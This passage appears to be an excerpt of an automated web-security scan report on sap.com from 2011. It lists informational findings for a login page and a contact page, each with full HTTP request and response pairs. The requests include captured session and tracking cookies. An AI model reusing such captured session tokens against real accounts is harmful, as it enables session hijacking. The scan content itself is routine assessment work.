SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:26:45 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:26:45 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:26:46 GMT
Content-Length: 90895


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language="javascri
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTIwNTgyMTAwMzQPZBYCAgUPZBYCAgMPZBYCZg9kFgICAw9kFgJmD2QWAgIXD2QWAmYPZBYCZg9kFgJmD2QWAmYPZBYiAgEPZBYCAgEPFgIeCFJlZmVycmVyBSUvYWJvdXQtc2FwL2V2ZW50cy93b3JsZHRvdXIvaW5kZXguZXB4ZAIDD2QWAmYPD2QWAh4Fc3R5bGUFDURpc3BsYXk6bm9uZTtkAgUPZBYIAgIPZBYCZg8WAh8BBQ9EaXNwbGF5OmlubGluZTtkAgMPDxYCHgRUZXh0BTx7Q291bnRyeV9MYWJlbH1XaGVyZSBpcyB5b3VyIG9mZmljZSBsb2NhdGVkOnsvQ291bnRyeV9MYWJlbH1kZAIEDxAPFgYeC18hRGF0YUJvdW5kZx4MQXV0b1Bvc3RCYWNrZx4QQ2F1c2VzVmFsaWRhdGlvbmdkEBXyATd7TGlzdF9Jbml0aWFsVmFsdWV9UGxlYXNlIFNlbGVjdC4uLnsvTGlzdF9Jbml0aWFsVmFsdWV9C0FmZ2hhbmlzdGFuDsOFbGFuZCBJc2xhbmRzB0FsYmFuaWEHQWxnZXJpYQ5BbWVyaWNhbiBTYW1vYQdBbmRvcnJhBkFuZ29sYQhBbmd1aWxsYQpBbnRhcmN0aWNhE0FudGlndWEgQW5kIEJhcmJ1ZGEJQXJnZW50aW5hB0FybWVuaWEFQXJ1YmEJQXVzdHJhbGlhB0F1c3RyaWEKQXplcmJhaWphbgdCYWhhbWFzB0JhaHJhaW4KQmFuZ2xhZGVzaAhCYXJiYWRvcwdCZWxhcnVzB0JlbGdpdW0GQmVsaXplBUJlbmluB0Jlcm11ZGEGQmh1dGFuB0JvbGl2aWEWQm9zbmlhIEFuZCBIZXJ6ZWdvdmluYQhCb3Rzd2FuYQ1Cb3V2ZXQgSXNsYW5kBkJyYXppbB5Ccml0aXNoIEluZGlhbiBPY2VhbiBUZXJyaXRvcnkRQnJ1bmVpIERhcnVzc2FsYW0IQnVsZ2FyaWEMQnVya2luYSBGYXNvB0J1cnVuZGkIQ2FtYm9kaWEIQ2FtZXJvb24GQ2FuYWRhCkNhcGUgVmVyZGUOQ2F5bWFuIElzbGFuZHMYQ2VudHJhbCBBZnJpY2FuIFJlcHVibGljBENoYWQFQ2hpbGUFQ2hpbmEQQ2hyaXN0bWFzIElzbGFuZBdDb2NvcyAoS2VlbGluZykgSXNsYW5kcwhDb2xvbWJpYQdDb21vcm9zBUNvbmdvJUNvbmdvLCBUaGUgRGVtb2NyYXRpYyBSZXB1YmxpYyBPZiBUaGUMQ29vayBJc2xhbmRzCkNvc3RhIFJpY2EOQ8O0dGUgRCdJdm9pcmUHQ3JvYXRpYQRDdWJhBkN5cHJ1cw5DemVjaCBSZXB1YmxpYwdEZW5tYXJrCERqaWJvdXRpCERvbWluaWNhEkRvbWluaWNhbiBSZXB1YmxpYwdFY3VhZG9yBUVneXB0C0VsIFNhbHZhZG9yEUVxdWF0b3JpYWwgR3VpbmVhB0VyaXRyZWEHRXN0b25pYQhFdGhpb3BpYRtGYWxrbGFuZCBJc2xhbmRzIChNYWx2aW5hcykNRmFyb2UgSXNsYW5kcwRGaWppB0ZpbmxhbmQGRnJhbmNlDUZyZW5jaCBHdWlhbmEQRnJlbmNoIFBvbHluZXNpYRtGcmVuY2ggU291dGhlcm4gVGVycml0b3JpZXMFR2Fib24GR2FtYmlhB0dlb3JnaWEHR2VybWFueQVHaGFuYQlHaWJyYWx0YXIGR3JlZWNlCUdyZWVubGFuZAdHcmVuYWRhCkd1YWRlbG91cGUER3VhbQlHdWF0ZW1hbGEGR3VpbmVhDUd1aW5lYS1CaXNzYXUGR3V5YW5hBUhhaXRpIUhlYXJkIElzbGFuZCBBbmQgTWNkb25hbGQgSXNsYW5kcx1Ib2x5IFNlZSAoVmF0aWNhbiBDaXR5IFN0YXRlKQhIb25kdXJhcwlIb25nIEtvbmcHSHVuZ2FyeQdJY2VsYW5kBUluZGlhCUluZG9uZXNpYRlJcmFuLCBJc2xhbWljIFJlcHVibGljIE9mBElyYXEHSXJlbGFuZAZ
...[SNIP]...

Request 2

GET /profile/login.epx?pmelayer=true&kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:28:45 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:28:45 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:28:47 GMT
Content-Length: 90751


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language="javascri
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTIwNTgyMTAwMzQPZBYCAgUPZBYCAgMPZBYCZg9kFgICAw9kFgJmD2QWAgIXD2QWAmYPZBYCZg9kFgJmD2QWAmYPZBYgAgMPZBYCZg8PZBYCHgVzdHlsZQUNRGlzcGxheTpub25lO2QCBQ9kFggCAg9kFgJmDxYCHwAFD0Rpc3BsYXk6aW5saW5lO2QCAw8PFgIeBFRleHQFPHtDb3VudHJ5X0xhYmVsfVdoZXJlIGlzIHlvdXIgb2ZmaWNlIGxvY2F0ZWQ6ey9Db3VudHJ5X0xhYmVsfWRkAgQPEA8WBh4LXyFEYXRhQm91bmRnHgxBdXRvUG9zdEJhY2tnHhBDYXVzZXNWYWxpZGF0aW9uZ2QQFfIBN3tMaXN0X0luaXRpYWxWYWx1ZX1QbGVhc2UgU2VsZWN0Li4uey9MaXN0X0luaXRpYWxWYWx1ZX0LQWZnaGFuaXN0YW4Ow4VsYW5kIElzbGFuZHMHQWxiYW5pYQdBbGdlcmlhDkFtZXJpY2FuIFNhbW9hB0FuZG9ycmEGQW5nb2xhCEFuZ3VpbGxhCkFudGFyY3RpY2ETQW50aWd1YSBBbmQgQmFyYnVkYQlBcmdlbnRpbmEHQXJtZW5pYQVBcnViYQlBdXN0cmFsaWEHQXVzdHJpYQpBemVyYmFpamFuB0JhaGFtYXMHQmFocmFpbgpCYW5nbGFkZXNoCEJhcmJhZG9zB0JlbGFydXMHQmVsZ2l1bQZCZWxpemUFQmVuaW4HQmVybXVkYQZCaHV0YW4HQm9saXZpYRZCb3NuaWEgQW5kIEhlcnplZ292aW5hCEJvdHN3YW5hDUJvdXZldCBJc2xhbmQGQnJhemlsHkJyaXRpc2ggSW5kaWFuIE9jZWFuIFRlcnJpdG9yeRFCcnVuZWkgRGFydXNzYWxhbQhCdWxnYXJpYQxCdXJraW5hIEZhc28HQnVydW5kaQhDYW1ib2RpYQhDYW1lcm9vbgZDYW5hZGEKQ2FwZSBWZXJkZQ5DYXltYW4gSXNsYW5kcxhDZW50cmFsIEFmcmljYW4gUmVwdWJsaWMEQ2hhZAVDaGlsZQVDaGluYRBDaHJpc3RtYXMgSXNsYW5kF0NvY29zIChLZWVsaW5nKSBJc2xhbmRzCENvbG9tYmlhB0NvbW9yb3MFQ29uZ28lQ29uZ28sIFRoZSBEZW1vY3JhdGljIFJlcHVibGljIE9mIFRoZQxDb29rIElzbGFuZHMKQ29zdGEgUmljYQ5Dw7R0ZSBEJ0l2b2lyZQdDcm9hdGlhBEN1YmEGQ3lwcnVzDkN6ZWNoIFJlcHVibGljB0Rlbm1hcmsIRGppYm91dGkIRG9taW5pY2ESRG9taW5pY2FuIFJlcHVibGljB0VjdWFkb3IFRWd5cHQLRWwgU2FsdmFkb3IRRXF1YXRvcmlhbCBHdWluZWEHRXJpdHJlYQdFc3RvbmlhCEV0aGlvcGlhG0ZhbGtsYW5kIElzbGFuZHMgKE1hbHZpbmFzKQ1GYXJvZSBJc2xhbmRzBEZpamkHRmlubGFuZAZGcmFuY2UNRnJlbmNoIEd1aWFuYRBGcmVuY2ggUG9seW5lc2lhG0ZyZW5jaCBTb3V0aGVybiBUZXJyaXRvcmllcwVHYWJvbgZHYW1iaWEHR2VvcmdpYQdHZXJtYW55BUdoYW5hCUdpYnJhbHRhcgZHcmVlY2UJR3JlZW5sYW5kB0dyZW5hZGEKR3VhZGVsb3VwZQRHdWFtCUd1YXRlbWFsYQZHdWluZWENR3VpbmVhLUJpc3NhdQZHdXlhbmEFSGFpdGkhSGVhcmQgSXNsYW5kIEFuZCBNY2RvbmFsZCBJc2xhbmRzHUhvbHkgU2VlIChWYXRpY2FuIENpdHkgU3RhdGUpCEhvbmR1cmFzCUhvbmcgS29uZwdIdW5nYXJ5B0ljZWxhbmQFSW5kaWEJSW5kb25lc2lhGUlyYW4sIElzbGFtaWMgUmVwdWJsaWMgT2YESXJhcQdJcmVsYW5kBklzcmFlbAVJdGFseQdKYW1haWNhBUphcGFuBkpvcmRhbgpLYXpha2hzdGFuBUtlbnlhCEtpcmliYXRpJkt
...[SNIP]...
15.6. https://www.sap.com/profile/slogin.epx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.sap.com
Path:   /profile/slogin.epx

Request 1

GET /profile/slogin.epx?pmelayer=true&kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://www.sap.com/profile/slogin.epx?pmelayer=true&kNtBzmUK9zU=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:26:12 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:26:12 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:26:13 GMT
Content-Length: 12172


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language="javascri
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTIxMTM5MzQyNTkPZBYCAgUPZBYCAgMPZBYCZg9kFgICFw9kFgJmD2QWAgIBDxYCHghSZWZlcnJlcgUvL3Byb2ZpbGUvc2xvZ2luLmVweD9wbWVsYXllcj10cnVlJmtOdEJ6bVVLOXpVPTFkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBSJtb2JqVGVtcGxhdGUkbG9naW5jdHJsJGNoa1JlbWVtYmVy8qBqIyCsrU/sTOh1HAMHD1Ibz+0=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['mobjForm'];
if (!theForm) {
theForm = document.mobjForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script type="text/javascript">
addthis_pub = 'sapglobalmarketing';
addthis_brand = '';
addthis_options = 'digg, delicious, newsvine, stumbleupon, furl, google, bookmarks, yahoo, myweb, live, ask, facebook, reddit, technorati';
addthis_share_subject = 'Link of Interest: ';
addthis_share_body = 'This link, {0}, might interest you.';
</script>
<script type="text/javascript" src="/global/js/addthis_widget.js"></script>
   
        <ContentTemplate>        
       
           
<table border="0" cellpadding="0" cellspacing="0" align="center">
   <tr>
       <td width="2" style="background-image:url(/global/images/StageShadowLeftBgRepeat.jpg);background-repeat:repeat-y"></td>
       <td width="972" class="Stage">
           <table border="0" cellpadding="0" cellspacing="0" width="100%">
               
               
               
               
               
               
               
               <tr>
                   
                   <td height="400" align="left" valign="top" class="MCPColor">
                       <div id="page-content">
                           <div class="MainContentPanel" id="divMainContentPanel">
                               <div class="Dove">
                                   
                                   
                                   
                                   
               
<style>#divMainContentPanel { margin-left:-5px; }</style>
    <div id="subfull" style="height:337px">
        <div id="subbottom" class="atoz-bottom">            
            <div class="utility-dropdown">
            <div id="utility" cla
...[SNIP]...

Request 2

GET /profile/slogin.epx?pmelayer=true&kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:27:50 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:27:50 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:27:49 GMT
Content-Length: 12044


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language="javascri
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTIxMTM5MzQyNTlkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBSJtb2JqVGVtcGxhdGUkbG9naW5jdHJsJGNoa1JlbWVtYmVyzGiWRkuT73MuP14bIPqjShQirss=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['mobjForm'];
if (!theForm) {
theForm = document.mobjForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script type="text/javascript">
addthis_pub = 'sapglobalmarketing';
addthis_brand = '';
addthis_options = 'digg, delicious, newsvine, stumbleupon, furl, google, bookmarks, yahoo, myweb, live, ask, facebook, reddit, technorati';
addthis_share_subject = 'Link of Interest: ';
addthis_share_body = 'This link, {0}, might interest you.';
</script>
<script type="text/javascript" src="/global/js/addthis_widget.js"></script>
   
        <ContentTemplate>        
       
           
<table border="0" cellpadding="0" cellspacing="0" align="center">
   <tr>
       <td width="2" style="background-image:url(/global/images/StageShadowLeftBgRepeat.jpg);background-repeat:repeat-y"></td>
       <td width="972" class="Stage">
           <table border="0" cellpadding="0" cellspacing="0" width="100%">
               
               
               
               
               
               
               
               <tr>
                   
                   <td height="400" align="left" valign="top" class="MCPColor">
                       <div id="page-content">
                           <div class="MainContentPanel" id="divMainContentPanel">
                               <div class="Dove">
                                   
                                   
                                   
                                   
               
<style>#divMainContentPanel { margin-left:-5px; }</style>
    <div id="subfull" style="height:337px">
        <div id="subbottom" class="atoz-bottom">            
            <div class="utility-dropdown">
            <div id="utility" class="mysapaccount">
                   <p>Please log in to access your account, or register to create a new account.</p>
                <div class="ut
...[SNIP]...
15.7. https://www.sap.com/sme/contactsap/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.sap.com
Path:   /sme/contactsap/index.epx

Request 1

GET /sme/contactsap/index.epx HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://www.sap.com/sme/contactsap/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB002004,9|SOLUTION=BARB003001,9|

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:41:13 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:41:13 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:41:13 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:41:15 GMT
Content-Length: 87584


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
B4GRm9ybUlEKClYU3lzdGVtLkd1aWQsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSRkZWQ2NGUzZi0xNTYwLTQwODMtYTg2Zi01NDM3ODVmODA2ZWYeDVJlZmVycmluZ1BhZ2UFGS9zbWUvY29udGFjdHNhcC9pbmRleC5lcHhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYlBR9tb2JqVGVtcGxhdGUkbW9iakhlYWRlciRtb2JqTG5nBTFtb2JqVGVtcGxhdGUkbW9iak1lbnUkbW9ialNlYXJjaEJhciRyYkNvbGxlY3Rpb24xBTFtb2JqVGVtcGxhdGUkbW9iak1lbnUkbW9ialNlYXJjaEJhciRyYkNvbGxlY3Rpb24yBTFtb2JqVGVtcGxhdGUkbW9iak1lbnUkbW9ialNlYXJjaEJhciRyYkNvbGxlY3Rpb24yBRttb2JqVGVtcGxhdGUkZm9ybSRUb3BpY0FyZWEFGW1vYmpUZW1wbGF0ZSRmb3JtJE1lc3NhZ2UFHW1vYmpUZW1wbGF0ZSRmb3JtJE1lc3NhZ2VUZXh0BR1tb2JqVGVtcGxhdGUkZm9ybSRDb250YWN0TWVCeQUcbW9ialRlbXBsYXRlJGZvcm0kU2FsdXRhdGlvbgUbbW9ialRlbXBsYXRlJGZvcm0kRmlyc3ROYW1lBRptb2JqVGVtcGxhdGUkZm9ybSRMYXN0TmFtZQUdbW9ialRlbXBsYXRlJGZvcm0kQ29tcGFueU5hbWUFHm1vYmpUZW1wbGF0ZSRmb3JtJEFkZHJlc3NMaW5lMQUebW9ialRlbXBsYXRlJGZvcm0kQWRkcmVzc0xpbmUyBRZtb2JqVGVtcGxhdGUkZm9ybSRDaXR5BRxtb2JqVGVtcGxhdGUkZm9ybSRQb3N0YWxDb2RlBRdtb2JqVGVtcGxhdGUkZm9ybSRQaG9uZQUXbW9ialRlbXBsYXRlJGZvcm0kRW1haWwFI21vYmpUZW1wbGF0ZSRmb3JtJFJlbGF0aW9uc2hpcFRvU0FQBRltb2JqVGVtcGxhdGUkZm9ybSRDb3VudHJ5BRhtb2JqVGVtcGxhdGUkZm9ybSRSZWdpb24FIW1vYmpUZW1wbGF0ZSRmb3JtJENvbnRhY3RTYWxlc1JlcAVGbW9ialRlbXBsYXRlJGZvcm0kQ29udGFjdFNhbGVzUmVwJDFmYmZmOGViLTQ3MDMtNGU2YS1hMmQ0LWI5Yjg1NThmMDM2NwVGbW9ialRlbXBsYXRlJGZvcm0kQ29udGFjdFNhbGVzUmVwJDFmYmZmOGViLTQ3MDMtNGU2YS1hMmQ0LWI5Yjg1NThmMDM2NwVGbW9ialRlbXBsYXRlJGZvcm0kQ29udGFjdFNhbGVzUmVwJGJjZDQ1MmJiLWU2ZmItNDA4NC04NTI4LTE3NjIzY2JiYmQwNwVGbW9ialRlbXBsYXRlJGZvcm0kQ29udGFjdFNhbGVzUmVwJGJjZDQ1MmJiLWU2ZmItNDA4NC04NTI4LTE3NjIzY2JiYmQwNwUcbW9ialRlbXBsYXRlJGZvcm0kRW1haWxPcHRJbgVBbW9ialRlbXBsYXRlJGZvcm0kRW1haWxPcHRJbiQxZmJmZjhlYi00NzAzLTRlNmEtYTJkNC1iOWI4NTU4ZjAzNjcFQW1vYmpUZW1wbGF0ZSRmb3JtJEVtYWlsT3B0SW4kMWZiZmY4ZWItNDcwMy00ZTZhLWEyZDQtYjliODU1OGYwMzY3BUFtb2JqVGVtcGxhdGUkZm9ybSRFbWFpbE9wdEluJGJjZDQ1MmJiLWU2ZmItNDA4NC04NTI4LTE3NjIzY2JiYmQwNwVBbW9ialRlbXBsYXRlJGZvcm0kRW1haWxPcHRJbiRiY2Q0NTJiYi1lNmZiLTQwODQtODUyOC0xNzYyM2NiYmJkMDcFHG1vYmpUZW1wbGF0ZSRmb3JtJFBob25lT3B0SW4FQW1vYmpUZW1wbGF0ZSRmb3JtJFBob25lT3B0SW4kMWZiZmY4ZWItNDcwMy00ZTZhLWEyZDQtYjliODU1OGYwMzY3BUFtb2JqVGVtcGxhdGUkZm9ybSRQaG9uZU9wdEluJDFmYmZmOG
...[SNIP]...

Request 2

GET /sme/contactsap/index.epx HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
